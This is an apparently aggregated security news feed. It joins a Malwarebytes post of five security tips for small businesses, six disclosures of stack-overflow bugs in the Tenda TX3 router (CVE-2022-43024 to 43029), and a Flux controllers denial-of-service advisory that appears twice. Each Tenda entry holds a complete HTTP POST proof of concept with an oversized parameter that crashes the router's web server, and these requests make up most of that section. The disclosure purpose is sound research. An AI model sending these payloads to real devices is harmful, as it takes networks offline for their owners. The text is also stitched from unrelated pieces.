Categories: Business
Five things that every business can do (and should be paying attention to).



(Read more...)




The post 5 essential security tips for SMBs appeared first on Malwarebytes Labs.

In any business, the security of each computer is intimately connected to the security of every other computer. Interconnectedness allows attackers to turn a breach, a fault, or an oversight on one machine into access on all the machines its connected to. That means any attack on any computer is a potential jumping off point for an attack on the entire business.

Trojans like Emotet and Agent Tesla can infiltrate deep into your organization, silently stealing sensitive information, while ransomware like LockBit can bring your entire business to a sudden, grinding halt.

To defend against them, organizations need to think about the tools and practices that will pay dividends throughout their network. To help, we’ve compiled five essential security tips for SMBs.

**1\. Have a plan for patching**

Criminals often break into computers by exploiting known flaws in the software they’re running (you can think of this like jimmying a broken lock). Security updates remove those flaws, which fixes the broken locks and shuts out the criminals.

Be warned: Patching an organization isn’t like keeping your laptop up to date, and many underestimate the time and planning required to do it properly. Like any complex, ongoing process it requires commitment, planning and prioritization.

Organizations need to know what computers they own, what software they’re running, what updates that software needs, how urgently it needs to happen, who is responsible for applying updates, what schedule they’re working to, and what the rollback plan is if something goes wrong. While it's technically possible to do this process manually, using an automated patch management platform will make your life infinitely easier.

Some choose to do this themselves, but, for obvious reasons, many prefer to let an experienced managed service provider (MSP) do it for them.

**2\. Use multi-factor authentication**

Getting on top of your patching closes a lot of doors on cybercriminals, but not all of them. There is no need for criminals to jimmy a lock if they can steal a key, and the keys to your kingdom are your users’ passwords.

_In theory_, putting those keys out of reach is easy: You just need all your users to choose strong, unique passwords for every account they use, all the time. In practice, this is an enormous uphill task that unnecessarily, and unfairly, transfers the responsibility for a key area of security from your IT specialists to your staff.

That’s where multi-factor authentication (MFA) comes in. There are many different ways to do MFA, but the most common form is asking users to type a one-time code from an app or SMS message next to their password. MFA is armour for your users’ passwords. It is hugely effective: It can protect you from stolen passwords and credential stuffing, shut out online and offline brute-force guessing attacks, and some forms of MFA will even stop phishing attempts.

The gold standard is MFA based on the FIDO2 standard, so we recommend you start there.

**3\. Turn off RDP wherever you can**

Of course, you don’t have to worry about criminals jimmying locks or stealing keys if you can simply block up the doorway. In most cases that’s not possible, but in one very important place it often is: Remote Desktop Protocol (RDP).

Cybercriminals love RDP and for many years guessing RDP passwords was the number one method of entry for ransomware gangs. No wonder: A stolen RDP session gives a criminal on the other side of the world the same access to your network as they’d get if they strolled into your office, pulled up a chair, and logged on to one of your Windows terminals.

All RDP connections accessible from the Internet are found within hours of going live, and spend their lives being probed relentlessly by multiple malicious computer programs looking to guess their passwords.

Strong passwords can keep you safe, brute-force protection can too, and MFA is very effective, but none of these work quite as well as simply turning off RDP altogher.

RDP was a lifeline during Covid, but do you still need it everywhere it’s turned on? Turn it off wherever you don’t need it and harden what’s left.

**4\. Reserve admin logins for admin tasks**

Every criminal or piece of malware that finds a way on to one of your computers is constrained by a set of rights. They inherit these rights from whatever legitimate program they’ve exploited or whichever user they’re impersonating. If they don’t have the rights they need they’ll try to get them, perhaps by using a tool like Mimikatz to steal the password of a passing admin. The harder they have to work to get the rights they need, the more likely you are to spot them before they do any real damage.

Standard users are heavily constrained, Local Administrators are powerful on one computer, and Domain Administrators are powerful everywhere. The question you must answer is: When a malicious actor ends up on your network, what type of user would you wish them to be? The more administrator accounts you have, and the more frequently they are used, the easier it for criminals to hijack one.

Admin accounts are designed for changing the way that computers and networks work, not for doing work on computers and networks. Use and assign admin rights as sparingly as you can.

**5\. Make offsite, offline backups**

Now, some hard truth: Even if you do your best to stop criminals breaking into your organization, and your best to detect and evict any that succeed, the worst can still happen.

We hope that you never find yourself locked out of your own network by ransomware, and steps like the ones above will make it much less likely that you are. However, the potential severity of a successful attack demands you are never complacent. Ransomware affects organizations, not computers. It is an existential threat to your business on the same level as fires, floods, and other disasters.

If you are affected by a ransomware attack your aim should be to recover your critical systems as quickly as possible. You will need a plan (one that isn’t stored on a computer) that outlines who does what, and which systems you need to restore in what order. To make this possible you’ll need comprehensive, recently tested, backups that are both offline and offsite, beyond the reach of your attackers.

**A muli-layered approach to cyber attack prevention**

An organizations ideal approach to cybersecurity can be aptly summed up in the maxim, "Prevent what you can, mitigate what you cannot." 

In this post, we've outlined a few best practices for your business to consider to lessen the likelyhood of an attack (as well as mitigate the fallout from one!). Now, all of these things sound great—but specifically what technologies are available to us to help bring these tips to fruition?

Our article on 5 technologies that help prevent cyberattacks for SMBs is a great start. Multi-vector Endpoint Protection (EP) is all but necessary to have as a first-layer of defense, and Endpoint Detection and Response is integral for detecting and responding to threats that _do_ make it through.

Check out the resources below to learn more about what options are available for SMBs to fight and recover from cyber attacks.

**More resources**

6 patch management best practices for businesses

Cyber threat hunting for SMBs: How MDR can help

Can your EDR handle a ransomware attack? 6-point checklist for an anti-ransomware EDR

4 ways businesses can save money on cyber insurance

5 essential security tips for SMBs

Tenda TX3 US_TX3V1.0br_V16.03.13.11_multi_TDE01 was discovered to contain a stack overflow via the list parameter at /goform/SetVirtualServerCfg.

Affect device: Tenda-TX3 US\_TX3V1.0br\_V16.03.13.11\_multi\_TDE01(https://www.tendacn.com/tw/download/detail-4015.html)

Vulnerability Type: Stack overflow

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the /goform/SetVirtualServerCfg page which influences the lastest version of Tenda-TX3 US\_TX3V1.0br\_V16.03.13.11\_multi\_TDE01 (https://www.tendacn.com/tw/download/detail-4015.html)

The vulnerability exists in the file /bin/httpd , function **formSetVirtualSer**.

First, the saveParentControlInfo function will call save_vitrualser_data.

In the save_vitrualser_data function, the buf variable holds the value of list, which is then assigned to lan\_ip by the _isoc99_sscanf function. Because _isoc99_sscanf has no input length limit, it causes a stack overflow vulnerability.

**POC and repetition**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

POST /goform/SetVirtualServerCfg HTTP/1.1
Host: 192.168.23.133
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q\=0.8,application/signed\-exchange;v\=b3;q\=0.9
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9
Connection: close
Content\-Length: 965

list\=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-43024: myCVE/TX3-6.md at main · tianhui999/myCVE

Tenda TX3 US_TX3V1.0br_V16.03.13.11_multi_TDE01 was discovered to contain a stack overflow via the startIp parameter at /goform/SetPptpServerCfg.

Affect device: Tenda-TX3 US\_TX3V1.0br\_V16.03.13.11\_multi\_TDE01(https://www.tendacn.com/tw/download/detail-4015.html)

Vulnerability Type: Stack overflow

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the /goform/SetPptpServerCfg page which influences the lastest version of Tenda-TX3 US\_TX3V1.0br\_V16.03.13.11\_multi\_TDE01 (https://www.tendacn.com/tw/download/detail-4015.html)

The vulnerability exists in the file /bin/httpd , function **formSetPPTPServer**.

User control pointer parameter _**startIp**_ in web requesting; _**v24**_ is a pointer parameter on the stack, and using _isoc99_sscanf to copy _**v9**_ to _**v24**_ without length limit will cause stack overflow.

**POC and repetition**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

POST /goform/SetPptpServerCfg HTTP/1.1
Host: 192.168.23.133
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q\=0.8,application/signed\-exchange;v\=b3;q\=0.9
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9
Cookie: password\=byn5gk
Connection: close
Content\-Length: 978

endIp\=b&startIp\=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-43025: myCVE/TX3-1.md at main · tianhui999/myCVE

Tenda TX3 US_TX3V1.0br_V16.03.13.11_multi_TDE01 was discovered to contain a stack overflow via the endIp parameter at /goform/SetPptpServerCfg.

Affect device: Tenda-TX3 US\_TX3V1.0br\_V16.03.13.11\_multi\_TDE01(https://www.tendacn.com/tw/download/detail-4015.html)

Vulnerability Type: Stack overflow

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the /goform/SetPptpServerCfg page which influences the lastest version of Tenda-TX3 US\_TX3V1.0br\_V16.03.13.11\_multi\_TDE01 (https://www.tendacn.com/tw/download/detail-4015.html)

The vulnerability exists in the file /bin/httpd , function **formSetPPTPServer**.

User control pointer parameter _**endIp**_ in web requesting; _**v28**_ is an array on the stack, and using _isoc99_sscanf to copy _**v15**_ to _**v28**_ without length limit will cause stack overflow.

**POC and repetition**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

POST /goform/SetPptpServerCfg HTTP/1.1
Host: 192.168.23.133
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q\=0.8,application/signed\-exchange;v\=b3;q\=0.9
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9
Cookie: password\=byn5gk
Connection: close
Content\-Length: 1116

startIp\=192.168.1.1&endIp\=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-43026: myCVE/TX3-2.md at main · tianhui999/myCVE

Tenda TX3 US_TX3V1.0br_V16.03.13.11_multi_TDE01 was discovered to contain a stack overflow via the firewallEn parameter at /goform/SetFirewallCfg.

Affect device: Tenda-TX3 US\_TX3V1.0br\_V16.03.13.11\_multi\_TDE01(https://www.tendacn.com/tw/download/detail-4015.html)

Vulnerability Type: Stack overflow

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the /goform/SetFirewallCfg page which influences the lastest version of Tenda-TX3 US\_TX3V1.0br\_V16.03.13.11\_multi\_TDE01 (https://www.tendacn.com/tw/download/detail-4015.html)

The vulnerability exists in the file /bin/httpd , function **formSetFirewallCfg**.

User control pointer parameter _**firewallEn**_ in web requesting; _**firewall\_buf**_ is a pointer parameter on the stack, and using strcpy to copy _**Var**_ to _**firewall\_buf**_ without length limit will cause stack overflow.

**POC and repetition**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

POST /goform/SetFirewallCfg HTTP/1.1
Host: 192.168.23.133
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q\=0.8,application/signed\-exchange;v\=b3;q\=0.9
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9
Cookie: password\=byn5gk
Connection: close
Content\-Length: 1227

firewallEn\=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-43027: myCVE/TX3-5.md at main · tianhui999/myCVE

Tenda TX3 US_TX3V1.0br_V16.03.13.11_multi_TDE01 was discovered to contain a stack overflow via the timeZone parameter at /goform/SetSysTimeCfg.

Affect device: Tenda-TX3 US\_TX3V1.0br\_V16.03.13.11\_multi\_TDE01(https://www.tendacn.com/tw/download/detail-4015.html)

Vulnerability Type: Stack overflow

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the /goform/SetSysTimeCfg page which influences the lastest version of Tenda-TX3 US\_TX3V1.0br\_V16.03.13.11\_multi\_TDE01 (https://www.tendacn.com/tw/download/detail-4015.html)

The vulnerability exists in the file /bin/httpd , function **fromSetSysTime**.

User control pointer parameter _**timeZone**_ in web requesting; _**v23**_ is a pointer parameter on the stack, and using _isoc99_sscanf or strcpy to copy _**v5**_ to _**v23**_ without length limit will cause stack overflow.

**POC and repetition**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

POST /goform/SetSysTimeCfg HTTP/1.1
Host: 192.168.23.133
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q\=0.8,application/signed\-exchange;v\=b3;q\=0.9
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9
Cookie: password\=byn5gk
Connection: close
Content\-Length: 1225

timeZone\=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-43028: myCVE/TX3-3.md at main · tianhui999/myCVE

Tenda TX3 US_TX3V1.0br_V16.03.13.11_multi_TDE01 was discovered to contain a stack overflow via the time parameter at /goform/SetSysTimeCfg.

Affect device: Tenda-TX3 US\_TX3V1.0br\_V16.03.13.11\_multi\_TDE01(https://www.tendacn.com/tw/download/detail-4015.html)

Vulnerability Type: Stack overflow

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the /goform/SetSysTimeCfg page which influences the lastest version of Tenda-TX3 US\_TX3V1.0br\_V16.03.13.11\_multi\_TDE01 (https://www.tendacn.com/tw/download/detail-4015.html)

The vulnerability exists in the file /bin/httpd , function **fromSetSysTime**.

User control pointer parameter _**time**_ in web requesting; _**v14**_ is a pointer parameter on the stack, and using _isoc99_sscanf to copy _**v9**_ to _**v14**_ without length limit will cause stack overflow.

**POC and repetition**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

POST /goform/SetSysTimeCfg HTTP/1.1
Host: 192.168.23.133
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q\=0.8,application/signed\-exchange;v\=b3;q\=0.9
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9
Cookie: password\=byn5gk
Connection: close
Content\-Length: 1237

timeType\=manual&time\=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-43029: myCVE/TX3-4.md at main · tianhui999/myCVE

Flux controllers within the affected versions range are vulnerable to a denial of service attack. Users that have permissions to change Flux’s objects, either through a Flux source or directly within a cluster, can provide invalid data to fields `.spec.interval` or `.spec.timeout` (and structured variations of these fields), causing the entire object type to stop being processed.

The issue has two root causes: a) the Kubernetes type `metav1.Duration` not being fully compatible with the Go type `time.Duration` as explained on [upstream report](https://github.com/kubernetes/apimachinery/issues/131); b) lack of validation within Flux to restrict allowed values.

### Workarounds

Admission controllers can be employed to restrict the values that can be used for fields `.spec.interval` and `.spec.timeout`, however upgrading to the latest versions is still the recommended mitigation.

### Credits

This issue was reported by Alexander Block (@codablock) through the Flux security mailing list (as [recommended](https://fluxcd.io/security/#report-a-vulnerability)).

### For more information

If you have any questions or comments about this advisory:

- Open an issue in any of the affected repositories.
- Contact us at the CNCF Flux channel.

### References

- https://github.com/kubernetes/apimachinery/issues/131



Flux controllers within the affected versions range are vulnerable to a denial of service attack. Users that have permissions to change Flux’s objects, either through a Flux source or directly within a cluster, can provide invalid data to fields .spec.interval or .spec.timeout (and structured variations of these fields), causing the entire object type to stop being processed.

The issue has two root causes: a) the Kubernetes type metav1.Duration not being fully compatible with the Go type time.Duration as explained on upstream report; b) lack of validation within Flux to restrict allowed values.

**Workarounds**

Admission controllers can be employed to restrict the values that can be used for fields .spec.interval and .spec.timeout, however upgrading to the latest versions is still the recommended mitigation.

**Credits**

This issue was reported by Alexander Block (@codablock) through the Flux security mailing list (as recommended).

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in any of the affected repositories.
*   Contact us at the CNCF Flux channel.

**References**

*   kubernetes/apimachinery#131

